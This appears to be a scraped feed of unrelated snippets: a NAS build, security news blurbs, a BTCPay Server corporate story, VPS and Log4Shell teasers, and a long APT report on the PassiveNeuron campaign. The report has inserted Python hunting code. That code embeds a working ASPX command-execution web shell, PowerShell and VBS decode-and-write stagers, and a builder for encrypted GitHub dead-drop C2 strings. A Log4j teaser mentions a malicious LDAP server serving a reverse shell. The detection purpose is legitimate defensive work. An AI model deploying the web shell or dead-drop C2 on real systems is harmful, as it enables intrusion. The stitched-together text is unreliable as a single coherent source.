Self-hosting a few services on one’s own hardware is a great way to wrest some control over your online presence while learning a lot about computers, software, and networking. A common entry point is using an old computer or Raspberry Pi to get something like a small NAS, DNS-level adblocker, or home automation service online, but the hobby can quickly snowball into server-grade hardware in huge racks. [Dennis] is well beyond this point, with a rack-mounted NAS already up and running. This build expands his existing NAS into one that can host a petabyte of storage built out of consumer-grade components.
The main reason for building this without relying too much on server-grade gear is that servers are generally designed to run in purpose-built rooms away from humans, and as a result their designers don’t generally take much consideration of how loud that environment becomes. [Dennis] is building a lot of the components from scratch for this build, including the case, the backplanes for the drives, and a backplane tester. With the backplanes installed, it’s time to hook up all of the data connections thanks to a few SAS expanders, which provide all of the SATA connections for the 45 drives.
There are two power supplies here as well, although unlike a server solution these aren’t redundant: each only serves half the drives. This also keeps it running quieter, along with a series of Noctua fans that cool the rest of the rack. The build finishes off with an LED strip which provides a quick visual status check for each of the drives in the bay. With that it’s ready for drives and to be connected to the network. It’s a ton of wiring and soldering, and great if you don’t want to use noisy server hardware. And, if you don’t need this much space or power, we’ve seen some NAS builds that are a bit on the smaller side as well.
PromptArmor threat researchers uncovered a vulnerability in Anthropic's new Cowork that had already been found in the AI company's Claude Code developer tool, and which allows a threat actor to trick the agent into uploading a victim's sensitive files to the attacker's own Anthropic account.
Overview On January 14, NSFOCUS CERT detected that Microsoft released the January Security Update patch, which fixed 112 security issues involving widely used products such as Windows, Microsoft Office, Microsoft SQL Server, Azure, etc., including high-risk vulnerability types such as privilege escalation and remote code execution. Among the vulnerabilities fixed by Microsoft’s monthly update this […]
BTC Inc, the parent company of Bitcoin Magazine and the organizer of major global Bitcoin conferences, has spent the past several years restructuring its internal operations around Bitcoin-native infrastructure, relying heavily on the open-source BTCPay Server to manage its payments, payroll, and treasury functions.
The effort reflects a broader push by the company to operate on what it describes as a “Bitcoin standard,” using bitcoin not only as a reserve asset but as a primary medium for internal and external transactions.
Executives and engineers involved in the project say the goal was to eliminate dependence on custodial payment processors, reduce cross-border settlement friction, and create a unified system capable of handling live commerce at speed and scale.
BTCPay Server, a self-hosted and non-custodial Bitcoin payments platform, emerged as the core infrastructure after BTC Inc evaluated multiple third-party payment solutions.
According to the company, custodial processors introduced counterparty risk and regulatory constraints, while off-the-shelf systems lacked the flexibility needed for global events and payroll coordination.
Conference payments as the first test case
BTC Inc first deployed BTCPay Server at its flagship conferences, where the need for high-throughput, real-time payments was most acute. Events regularly host tens of thousands of attendees and dozens of vendors, often in environments with constrained connectivity and strict operational timelines.
Using BTCPay’s web-based point-of-sale system, vendors were able to accept on-chain and Lightning payments directly to their own wallets. BTC Inc also used BTCPay’s “mark as paid” functionality to record cash and card transactions alongside bitcoin payments, allowing vendors to reconcile all sales through a single interface.
The system was rolled out across four major events between 2024 and 2025, beginning with Bitcoin Asia in Hong Kong and expanding through conferences in Nashville, Abu Dhabi, and Las Vegas.
Each event served as an iteration point, with the operations team refining vendor onboarding, payment flows, and reporting tools.
Record-setting deployment in Las Vegas
The largest deployment took place at The Bitcoin Conference 2025 in Las Vegas, where BTC Inc integrated BTCPay Server with Lightning-enabled NFC Bolt Cards and optimized point-of-sale infrastructure across the venue.
On May 28, 2025, the event set a Guinness World Record for the most cryptocurrency point-of-sale transactions completed in eight hours, recording 4,187 transactions.
BTCPay-powered terminals operated alongside traditional Square point-of-sale systems, which had recently added Bitcoin payment support. BTC Inc said the side-by-side deployment demonstrated that Bitcoin-native payment systems could function at the same scale and speed as established fiat infrastructure in high-traffic commercial environments.
Across all conferences, BTC Inc reports more than 5,600 in-person Bitcoin transactions, totaling approximately 2.09 BTC in volume.
Expanding into BTC Inc payroll and vendor payments
Following the conference deployments, BTC Inc extended BTCPay Server into internal finance operations. The company adopted BTCPay’s VendorPay plugin to manage outbound payments to contractors, partners, and employees, many of whom are distributed across multiple jurisdictions.
VendorPay allows payments to be batched, scheduled, and tracked, reducing transaction fees and eliminating delays associated with international bank transfers.
BTC Inc says it has processed more than $1 million in Bitcoin payouts using the system, without relying on intermediaries or custodial services.
As payment volume increased, the company implemented BTCPay’s native multisignature wallet support to add shared approval controls to treasury management. Transactions now require multiple signatures, with hardware wallets integrated through BTCPay Vault, allowing the company to maintain self-custody while distributing authorization across team members.
Automating Bitcoin accumulation
BTC Inc developed a BTCPay Server plugin known internally as “Bitcoin Stacker” to automatically convert a portion of fiat revenue into bitcoin. The system routes a percentage of Stripe credit card receipts into bitcoin purchases, creating a rules-based dollar-cost averaging process.
Since launching the program in January 2025, BTC Inc says it has accumulated more than 6.5 BTC through automated conversions. The company describes the approach as a conservative treasury policy rather than a speculative strategy, designed to build bitcoin-denominated working capital that can be reused for vendor payments and payroll through BTCPay.
BTC Inc says BTCPay Server has become a core operational tool across events, finance, and treasury functions, citing reduced payment friction, faster settlement, and consistent self-custodial workflows.
The company also contributed operational feedback that informed improvements to VendorPay and multisignature support.
While aligned with BTC Inc’s long-term view on Bitcoin adoption, the company says the shift has been driven primarily by operational efficiency.
Cybersecurity researchers discovered an unsecured 16TB database exposing 4.3 billion professional records, including names, emails, and LinkedIn data. Learn what happened, why this massive data leak enables new scams, and how to protect your PII.
How much does IT downtime really cost your organization?
Most executives think it's just an annoying blip on the radar. But if you've ever been on the receiving end of a 3 AM call because the production server went down, you know better. Studies put the number at over $5,000 per minute for large organizations. Per minute. That's the cost of your CEO unable to access email, sales teams locked out of CRM systems, and customers abandoning shopping carts.
Back in 2024, we gave a brief description of a complex cyberespionage campaign that we dubbed “PassiveNeuron”. This campaign involved compromising the servers of government organizations with previously unknown APT implants, named “Neursite” and “NeuralExecutor”. However, since its discovery, the PassiveNeuron campaign has been shrouded in mystery. For instance, it remained unclear how the implants in question were deployed or what actor was behind them.
After we detected this campaign and prevented it from spreading in June 2024, we did not see any further malware deployments linked to PassiveNeuron for quite a long time, about six months. However, since December 2024, we have observed a new wave of infections related to PassiveNeuron, with the latest ones dating back to August 2025. These infections targeted government, financial and industrial organizations located in Asia, Africa, and Latin America. Since identifying these infections, we have been able to shed light on many previously unknown aspects of this campaign, discovering details about the initial infection and gathering clues on attribution.
While investigating PassiveNeuron infections both in 2024 and 2025, we found that a vast majority of targeted machines were running Windows Server. Specifically, in one particular infection case, we observed attackers gain initial remote command execution capabilities on the compromised server through the Microsoft SQL software. While we do not have clear visibility into how attackers were able to abuse the SQL software, it is worth noting that SQL servers typically get compromised through:
Exploitation of vulnerabilities in the server software itself
Exploitation of SQL injection vulnerabilities present in the applications running on the server
Getting access to the database administration account (e.g. by brute-forcing the password) and using it to execute malicious SQL queries
After obtaining the code execution capabilities with the help of the SQL software, attackers deployed an ASPX web shell for basic malicious command execution on the compromised machine. However, at this stage, things did not go as planned for the adversary. The Kaspersky solution installed on the machine was preventing the web shell deployment efforts, and the process of installing the web shell ended up being quite noisy.
In attempts to evade detection of the web shell, attackers performed its installation in the following manner:
They dropped a file containing the Base64-encoded web shell on the system.
They dropped a PowerShell script responsible for Base64-decoding the web shell file.
They launched the PowerShell script in an attempt to write the decoded web shell payload to the filesystem.
As Kaspersky solutions kept blocking the web shell installation, we observed the attackers repeat the steps above several times with minor adjustments, such as:
Using hexadecimal encoding of the web shell instead of Base64
Using a VBS script instead of a PowerShell script to perform decoding
Writing the script contents in a line-by-line manner
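The staging pattern above (an encoded blob on disk plus a small script that decodes it and writes the web shell out) is easy to hunt for on the file system. The following is an added example, not code from the report: it takes a set of dropped files, undoes Base64 or hex encoding (after stripping line breaks, to cover the line-by-line variant), scores the result for ASP.NET web-shell markers, and separately flags PowerShell or VBS scripts whose only job is to decode and write a payload. The marker lists and the sample files are this example's own construction.

```python
"""Flag web-shell payloads that were dropped in Base64 or hex form together with
the PowerShell or VBS script meant to decode and write them. Added example, not
code from the report; sample files are constructed and the marker lists are this
example's own choice."""
import base64
import binascii
import re
from typing import Dict, List, Optional, Tuple

# Strings that rarely co-occur outside an ASP.NET web shell.
ASPX_MARKERS = (
    "<%@ Page", "Request[", "Request.Form", "ProcessStartInfo",
    "Process.Start", "cmd.exe", "Response.Write", "Server.ScriptTimeout",
)
# Behaviour of the staging scripts: read a blob, decode it, write it to disk.
DECODER_PATTERNS = (
    re.compile(r"FromBase64String", re.I),                    # PowerShell Base64 decode
    re.compile(r"WriteAllBytes|Set-Content|Out-File", re.I),  # PowerShell file write
    re.compile(r"\bChr\(|&H", re.I),                          # VBS hex-to-char idiom
    re.compile(r"CreateTextFile|OpenTextFile", re.I),         # VBS FileSystemObject write
)
SCRIPT_EXTENSIONS = (".ps1", ".vbs")


def decode_blob(data: bytes) -> Tuple[Optional[str], bytes]:
    """Undo hex or Base64 encoding. Whitespace is stripped first because the
    attackers also wrote the blob out line by line."""
    stripped = b"".join(data.split())
    if stripped and len(stripped) % 2 == 0 and re.fullmatch(rb"[0-9a-fA-F]+", stripped):
        return "hex", bytes.fromhex(stripped.decode("ascii"))
    try:
        return "base64", base64.b64decode(stripped, validate=True)
    except (binascii.Error, ValueError):
        return None, b""


def webshell_score(text: str) -> int:
    """Number of distinct web-shell markers present; two or more is suspicious."""
    return sum(1 for marker in ASPX_MARKERS if marker in text)


def classify(name: str, data: bytes) -> Optional[str]:
    """Verdict for one dropped file, or None if nothing suspicious was found."""
    encoding, decoded = decode_blob(data)
    if encoding and webshell_score(decoded.decode("latin-1")) >= 2:
        return f"{name}: {encoding}-encoded ASPX web shell"
    text = data.decode("latin-1")
    if webshell_score(text) >= 2:
        return f"{name}: plaintext ASPX web shell"
    decoder_hits = sum(1 for pattern in DECODER_PATTERNS if pattern.search(text))
    if name.lower().endswith(SCRIPT_EXTENSIONS) and decoder_hits >= 2:
        return f"{name}: decode-and-write staging script"
    return None


def scan(files: Dict[str, bytes]) -> List[str]:
    """Run classify() over a name -> contents map and keep the verdicts."""
    return [v for v in (classify(n, d) for n, d in files.items()) if v]


# Constructed samples: a minimal command-execution ASPX shell in the three forms
# the text lists (Base64, hex, Base64 written line by line), the two decoder
# scripts, and one benign Base64 file that must not be flagged.
SHELL = (b'<%@ Page Language="C#" %><% var p = new System.Diagnostics.ProcessStartInfo('
         b'"cmd.exe", "/c " + Request["c"]); p.RedirectStandardOutput = true; '
         b'p.UseShellExecute = false; Response.Write(System.Diagnostics.Process.Start(p)'
         b'.StandardOutput.ReadToEnd()); %>')
_B64 = base64.b64encode(SHELL)
SAMPLE_FILES = {
    "stage.txt": _B64,
    "stage_hex.txt": SHELL.hex().encode("ascii"),
    "stage_lines.txt": b"\r\n".join(_B64[i:i + 64] for i in range(0, len(_B64), 64)),
    "dec.ps1": b'$b=[Convert]::FromBase64String((Get-Content stage.txt))\r\n'
               b'[IO.File]::WriteAllBytes("C:\\inetpub\\wwwroot\\x.aspx",$b)',
    "dec.vbs": b'Set f=CreateObject("Scripting.FileSystemObject").CreateTextFile("x.aspx")\r\n'
               b'For i=1 To Len(h) Step 2: f.Write Chr(CLng("&H" & Mid(h,i,2))): Next',
    "notes.txt": base64.b64encode(b"release notes for build 1234"),
}

if __name__ == "__main__":
    for verdict in scan(SAMPLE_FILES):
        print(verdict)
```

Run it as-is to see the five verdicts; in practice you would feed `scan()` the contents of recently created files under the web root or temp directories. Scoring on two or more markers rather than one keeps benign ASPX pages with a single `Response.Write` out of the results.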
Having failed to deploy the web shell, attackers decided to use more advanced malicious implants to continue the compromise process.
Malicious implants
Over the last two years, we have observed three implants used over the course of PassiveNeuron infections, which are:
Neursite, a custom C++ modular backdoor used for cyberespionage activities
NeuralExecutor, a custom .NET implant used for running additional .NET payloads
the Cobalt Strike framework, a commercial tool for red teaming
While we saw different combinations of these implants deployed on targeted machines, we observed that in the vast majority of cases, they were loaded through a chain of DLL loaders. The first-stage loader in the chain is a DLL file placed in the system directory. Some of these DLL file paths are:
C:\Windows\System32\wlbsctrl.dll
C:\Windows\System32\TSMSISrv.dll
C:\Windows\System32\oci.dll
Storing DLLs under these paths benefits the attackers, because placing libraries with these names inside the System32 folder is enough to ensure persistence. If present on the file system, these DLLs are loaded automatically at startup (the first two into the svchost.exe process, the third into msdtc.exe) through the Phantom DLL Hijacking technique: a legitimate process looks the library up by name, the system does not normally ship a file with that name, so whatever is placed there gets loaded.
It should also be noted that these DLLs are more than 100 MB in size: the attackers artificially inflate them by appending junk overlay bytes. This is usually done to make malicious implants harder for security solutions to detect, for instance by exceeding file-size limits for scanning.
On startup, the first-stage DLLs iterate through the list of installed network adapters, calculating a 32-bit hash of each adapter’s MAC address. If none of the hashes equals the value specified in the loader configuration, the loader exits. This MAC address check ensures that the DLLs run only on the intended victim machine and hinders execution in a sandbox environment. Such precise narrowing of the victim set shows the adversary’s interest in specific organizations and once again underscores the targeted nature of this threat.
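A quick check for the first-stage loader described in the two paragraphs above is to look for the phantom names themselves, since on a clean host none of those files exist, and to report whether any hit carries the size inflation. The following is an added example, not code from the report: the DLL names and host processes are the ones the text gives, the 100 MiB threshold follows the "more than 100 MB" observation, and the directory produced by `build_sample_dir()` is a constructed fixture for trying the logic offline.

```python
"""Look for the first-stage loader names quoted in the text in System32 and
report whether any present file carries the described size inflation.
Added example, not from the report; the sample directory is constructed."""
import hashlib
import os
import tempfile
from pathlib import Path
from typing import Dict, List, Union

# Name -> process that loads it when the file exists (phantom DLL hijacking:
# the loading process looks the name up but Windows does not ship the file).
PHANTOM_DLLS = {
    "wlbsctrl.dll": "svchost.exe",
    "TSMSISrv.dll": "svchost.exe",
    "oci.dll": "msdtc.exe",
}
INFLATED_BYTES = 100 * 1024 * 1024  # "more than 100 MB" per the text


def sha256_of(path: Path, chunk: int = 1 << 20) -> str:
    """Stream the hash so a padded 100 MiB file is not read into memory at once."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def hunt(system32: Union[str, Path], threshold: int = INFLATED_BYTES) -> List[Dict]:
    """Return one finding per phantom-DLL name that exists in the directory.
    On a clean host every lookup misses and the list is empty."""
    base = Path(system32)
    findings = []
    for name, host in PHANTOM_DLLS.items():
        candidate = base / name
        if not candidate.is_file():
            continue
        size = candidate.stat().st_size
        findings.append({
            "name": name,
            "path": str(candidate),
            "host_process": host,
            "size": size,
            "inflated": size > threshold,   # junk overlay pushes size past threshold
            "sha256": sha256_of(candidate),
        })
    return findings


def hunt_local_system32(threshold: int = INFLATED_BYTES) -> List[Dict]:
    """Convenience wrapper for running on the host itself."""
    root = os.environ.get("SystemRoot", r"C:\Windows")
    return hunt(Path(root) / "System32", threshold)


def build_sample_dir() -> Path:
    """Constructed fixture: a fake System32 holding two of the names, one of
    them padded with junk overlay bytes so it trips a small test threshold."""
    d = Path(tempfile.mkdtemp(prefix="phantom-dll-"))
    (d / "wlbsctrl.dll").write_bytes(b"MZ" + b"\x00" * 62)
    (d / "oci.dll").write_bytes(b"MZ" + b"\x00" * 62 + b"\xcc" * 8192)
    (d / "kernel32.dll").write_bytes(b"MZ" + b"\x00" * 62)   # unrelated, ignored
    return d


if __name__ == "__main__":
    for finding in hunt_local_system32():
        print(finding)
```

The presence of any of these names is the signal; the `inflated` flag and hash are there so the finding can be triaged without opening the file. Remember that a scanner with a file-size ceiling is exactly what the padding is meant to defeat, so size alone should never suppress a hit.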
Having verified that it is running on a target machine, the loader continues by loading a second-stage loader DLL stored on disk. The paths and names of the second-stage DLLs (examples include elscorewmyc.dll and wellgwlserejzuai.dll) differed between machines. These second-stage DLLs also had an artificially inflated file size (in excess of 60 MB); their job was to open a text file containing a Base64-encoded and AES-encrypted third-stage loader, decode and decrypt it, and launch it.
Snippet of the payload file contents
This payload is a DLL as well, responsible for launching a fourth-stage shellcode loader inside another process (e.g. WmiPrvSE.exe or msiexec.exe) which is created in suspended mode. In turn, this shellcode loads the final payload: a PE file converted to a custom executable format.
In summary, the process of loading the final payload can be represented with the following graph:
Final payload loading
It is also notable that attackers attempted to use slightly different variants of the loading scheme for some of the target organizations. For example, we have seen cases without payload injection into another process, or with DLL obfuscation on disk with VMProtect.
The Neursite backdoor
Among the three final payload implants that we mentioned above, the Neursite backdoor is the most potent one. We dubbed it so because we observed the following source code path inside the discovered samples: E:\pro\code\Neursite\client_server\nonspec\mbedtls\library\ssl_srv.c. The configuration of this implant contains the following parameters:
List of C2 servers and their ports
List of HTTP proxies that can be used to connect to C2 servers
List of HTTP headers used while connecting to HTTP-based C2 servers
A relative URL used while communicating with HTTP-based C2 servers
A range of wait time between two consecutive C2 server connections
A byte array of hours and days of the week when the backdoor is operable
An optional port that should be opened for listening to incoming connections
The Neursite implant can use the TCP, SSL, HTTP and HTTPS protocols for C2 communications. As the configuration implies, Neursite can either connect to the C2 server directly or wait for another machine to start communicating with it through the specified listening port. In the cases we observed, Neursite samples were configured to use either external servers or compromised internal infrastructure for C2 communications.
The default range of commands implemented inside this backdoor allows attackers to:
Retrieve system information.
Manage running processes.
Proxy traffic through other machines infected with the Neursite implant, in order to facilitate lateral movement.
Additionally, this implant is equipped with a component that allows loading supplementary plugins. We observed attackers deploy plugins with the following capabilities:
Shell command execution
File system management
TCP socket operations
The NeuralExecutor loader
NeuralExecutor is another custom implant deployed over the course of the PassiveNeuron campaign. This implant is .NET based, and we found that it employed the open-source ConfuserEx obfuscator for protection against analysis. It implements multiple methods of network communication, namely TCP, HTTP/HTTPS, named pipes, and WebSockets. Upon establishing a communication channel with the C2 server, the backdoor can receive commands allowing it to load .NET assemblies. As such, the main capability of this backdoor is to receive additional .NET payloads from the network and execute them.
Tricky attribution
Both Neursite and NeuralExecutor, the two custom implants we found to be used in the PassiveNeuron campaign, have never been observed in any previous cyberattacks. We had to look for clues that could hint at the threat actor behind PassiveNeuron.
When we started investigating PassiveNeuron in 2024, we spotted one such blatantly obvious clue:
Function names found inside NeuralExecutor
In the code of the NeuralExecutor samples we observed in 2024, the names of all functions had been replaced with strings prefixed with “Супер обфускатор”, Russian for “Super obfuscator”. It is important to note, however, that this string was deliberately introduced by the attackers while using the ConfuserEx obfuscator. Strings inserted into malware on purpose should be assessed carefully during attribution, because threat actors may insert strings in languages they do not speak in order to create false flags intended to confuse researchers and incident responders and lead them to an error of judgement when attributing the threat. For that reason, we attached little evidential weight to the presence of the “Супер обфускатор” string back in 2024.
After examining the NeuralExecutor samples used in 2025, we found that the Russian-language string had disappeared. However, this year we noticed another peculiar clue related to this implant. While the 2024 samples were designed to retrieve the C2 server addresses straight from the configuration, the 2025 ones did so by using the Dead Drop Resolver technique. Specifically, the new NeuralExecutor samples that we found were designed to retrieve the contents of a file stored in a GitHub repository, and extract a string from it:
Contents of the configuration file stored on GitHub
The malware locates this string by searching for two delimiters, wtyyvZQY and stU7BU0R, that mark the start and the end of the configuration data. The bytes of this string are then Base64-decoded and decrypted with AES to obtain the C2 server address.
Snippet of the implant configuration
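The two-delimiter dead drop above is simple to reproduce, and doing so is useful when you need to pull the current C2 out of a captured repository file or to build a detection that watches for that delimiter pair in fetched content. The block below is an added example, not code from the report. The delimiters are the ones quoted in the text; the key, IV, AES-CBC mode and PKCS#7 padding are assumptions, because the text does not state them; and the dead-drop text produced by `make_dead_drop()` is constructed, not the real repository file. The same Base64-then-AES unwrap is what the text describes earlier for the third-stage loader kept in a text file on disk, so `resolve_c2()` is the shape of that step as well, with the delimiter search replaced by reading the file.

```python
"""Recover a C2 address from a dead-drop file: locate the two delimiters,
Base64-decode what lies between them, then AES-decrypt. Added example, not
code from the report; key, IV, mode and padding are assumptions."""
import base64
import binascii
from typing import Optional

START_DELIM = "wtyyvZQY"   # delimiters quoted in the text
END_DELIM = "stU7BU0R"


def extract_between(text: str, start: str = START_DELIM, end: str = END_DELIM) -> Optional[str]:
    """Return the text between the first start delimiter and the next end
    delimiter, or None when either is missing (the resolver then has no C2)."""
    i = text.find(start)
    if i < 0:
        return None
    j = text.find(end, i + len(start))
    if j < 0:
        return None
    return text[i + len(start):j].strip()


def aes_cbc(key: bytes, iv: bytes, data: bytes, decrypt: bool) -> bytes:
    """AES-CBC with PKCS#7 padding (assumed mode). Imported lazily so the
    delimiter parsing above works even where 'cryptography' is not installed."""
    from cryptography.hazmat.primitives import padding
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    cipher = Cipher(algorithms.AES(key), modes.CBC(iv))
    if decrypt:
        dec = cipher.decryptor()
        padded = dec.update(data) + dec.finalize()
        unpadder = padding.PKCS7(128).unpadder()
        return unpadder.update(padded) + unpadder.finalize()
    padder = padding.PKCS7(128).padder()
    padded = padder.update(data) + padder.finalize()
    enc = cipher.encryptor()
    return enc.update(padded) + enc.finalize()


def resolve_c2(dead_drop_text: str, key: bytes, iv: bytes) -> str:
    """Implant side: delimiters -> Base64 -> AES -> C2 string."""
    blob = extract_between(dead_drop_text)
    if blob is None:
        raise ValueError("delimiters not found in dead-drop content")
    try:
        ciphertext = base64.b64decode(blob, validate=True)
    except binascii.Error as exc:
        raise ValueError("data between delimiters is not valid Base64") from exc
    return aes_cbc(key, iv, ciphertext, decrypt=True).decode("utf-8")


def make_dead_drop(c2: str, key: bytes, iv: bytes) -> str:
    """Attacker side, re-implemented for testing (constructed): hide the
    encrypted C2 between the delimiters inside an innocuous-looking file."""
    ciphertext = aes_cbc(key, iv, c2.encode("utf-8"), decrypt=False)
    return ("# build notes\nall targets green\n"
            + START_DELIM + base64.b64encode(ciphertext).decode("ascii") + END_DELIM
            + "\nsee wiki for details\n")


if __name__ == "__main__":
    demo_key, demo_iv = b"\x11" * 32, b"\x22" * 16   # assumed demo values
    drop = make_dead_drop("203.0.113.10:443", demo_key, demo_iv)
    print(resolve_c2(drop, demo_key, demo_iv))
```

For detection, `extract_between()` alone is enough: the delimiter pair is a fixed string that does not occur in ordinary repository content, so matching it in proxy or EDR logs of fetched GitHub raw files catches the resolver even when the key is unknown. The AES helper depends on the `cryptography` package; the parsing part has no dependency beyond the standard library.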
It is notable that this exact method of obtaining C2 server addresses from GitHub, using a string containing delimiter sequences, is quite popular among Chinese-speaking threat actors. For instance, we frequently observed it being used in the EastWind campaign, which we previously connected to the APT31 and APT27 Chinese-speaking threat actors.
Furthermore, during our investigation, we learned one more fact that could be useful for attribution. We observed numerous attempts to deploy the PassiveNeuron loader in one particular organization. After discovering yet another failed deployment, we detected a malicious DLL named imjp14k.dll. Analysis of this DLL revealed the PDB path G:\Bee\Tree(pmrc)\Src\Dll_3F_imjp14k\Release\Dll.pdb. This PDB string was referenced in a report by Cisco Talos on activities likely associated with the threat actor APT41, and the discovered DLL exhibits the same malicious behavior as described in that report. However, it remains unclear why this DLL was uploaded to the target machine. Possible explanations are that the attackers deployed it as a replacement for the PassiveNeuron-related implants, or that it was used by another actor who compromised the organization at the same time as the attackers behind PassiveNeuron.
When dealing with attribution of cyberattacks that are known to involve false flags, it is difficult to understand which attribution indicators to trust, or whether to trust any at all. However, the overall TTPs of the PassiveNeuron campaign most resemble the ones commonly employed by Chinese-speaking threat actors. Since TTPs are usually harder to fake than indicators like strings, we are, as of now, attributing the PassiveNeuron campaign to a Chinese-speaking threat actor, albeit with a low level of confidence.
Conclusion
The PassiveNeuron campaign has been distinctive in the way that it primarily targets server machines. These servers, especially the ones exposed to the internet, are usually lucrative targets for APTs, as they can serve as entry points into target organizations. It is thus crucial to pay close attention to the protection of server machines. Wherever possible, the attack surface associated with these servers should be reduced to a minimum, and all server applications should be monitored to prevent emerging infections in a timely manner. Specific attention should be paid to protecting applications against SQL injections, which are commonly exploited by threat actors to obtain initial access. Another thing to focus on is protection against web shells, which are deployed to facilitate compromise of servers.
Boys and girls today I would like to quickly share with you in a nutshell an interesting offer for good quality and affordable VPS servers. There comes a time in the life of every IT guy, whether home-grown, amateur or professional, to do a bit of admin stuff. Set something up from start to finish. You can do it in the comfort of your home, or
Another strange thing I decided to do with 0ut3r.space was to serve it via Gemini, I mean not the full copy, but a frontage only (full copy maybe if there will be someone who wants to read it in the Gemini world). As always, I wanted to learn something new while discovering something new. Also, only real hackers serve content over Gemini (lol),
It is very important to have a development or test environment for whatever you are working on. It does not matter if it is your home made project, your personal website, your school project or your work stuff. You should always follow good practice and have a test environment (with backup) for all changes and experiments before going into
Remote connection for Windows is pretty easy. Built in RDP server and client allows you to connect to remote Windows machine without any additional software. It is of course not too safe, to allow remote connection from the Internet, without any additional security layer, but this is not the topic for today. Today we are talking about local
Following the previous tutorial in which we looked at the log4j vulnerability in VMWare vSphere server, I got some questions about how to set up a malicious LDAP server on Linux. The attacker controlled LDAP server is required to provide the malicious java class (with a reverse shell for example) in response to the forged [...]
Log4Shell is a critical vulnerability with the highest possible CVSSv3 score of 10.0 that affects thousands of products running Apache Log4j and leaves millions of targets potentially vulnerable. CVE-2021-44228 affects log4j versions 2.0-beta9 to 2.14.1. Log4j is an incredibly popular logging library used in many different products and various Apache frameworks like Struts2, Kafka, and [...]